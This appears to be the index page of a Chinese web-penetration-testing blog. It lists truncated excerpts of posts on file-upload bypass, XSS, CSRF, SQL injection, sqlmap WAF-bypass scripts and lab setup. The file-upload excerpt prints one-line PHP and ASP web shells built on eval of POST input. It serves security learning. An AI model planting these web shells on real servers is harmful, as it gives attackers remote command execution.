愿浪飒精神伴你左右,网络安全之路任重而道远。
文件上传绕过

文件上传绕过

一句话木马 PHP: <?php @eval($_POST['chopper']);?> ASP: <%eval request("c……

XSS笔记

XSS笔记

原理:前端代码注入 条件: 1.用户能够控制输入 2.程序执行的代码拼接了用户输入的数据。 类型 反射型XSS:必须一次性输入所有恶意语句,利用条件苛刻 存储型XSS:持久性,将我们的恶意语句存储起来……

CSRF跨站脚本攻击

CSRF跨站脚本攻击

Cookie:代表你身份的东西存储在浏览器 同源策略:A网站填充A Cookie 时效性:默认情况下 一次会话(浏览器重启) XSS:窃取cookie CSRF:利用cookie ……

史上最全XSS只是总结

史上最全XSS只是总结

XSS基础 跨站脚本(英语:Cross-site scripting,通常简称为:XSS)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会……

SQL注入姊妹篇

SQL注入姊妹篇

常见数据库参考: https://blog.csdn.net/gengkui9897/article/details/89294936 数据库语法学习: https://www.w3school.co……

漏洞之王SQL注入

漏洞之王SQL注入

注入:核心是什么?把输入当作代码,可以是url,可以是表单,还可以是数据包中的任何一个参数 以下皆以以MySQL为例,如有特例会注明。 如果觉得描述的过于简单,会有详述文章供参考。 显错注入 网页页面……

SQLmap 绕 WAF脚本编写

SQLmap 绕 WAF脚本编写

WAF(web application firewall):Web应用防火墙 WAF为了防御网站被入侵的常见手段: 检测到入侵者会拦截你当前访问的页面,或者跳转到其他界面,再或者直接ban你的IP。 ……

Web渗透基础之正则表达式

Web渗透基础之正则表达式

学习正则表达式可以参考菜鸟教程和W3c。 什么是正则表达式? 正则表达式又称规则表达式,在代码中常简写为regex、regexp或RE,正则表达式通常被用来检索、替换那些符合某个模式的文……

登陆注册系统

登陆注册系统

代码共四个文件 1.loginsign.html <html> <head> <meta charset="utf-8"> <title&……

Web渗透基础-快速搭建web安全测试环境

Web渗透基础-快速搭建web安全测试环境

什么是动态语言 服务器环境快速搭建 phpstudy的介绍 快速搭建一个网站 一,什么是动态语言? 动态语言 :在这里我们只说用来写网站的常用语言,也就是……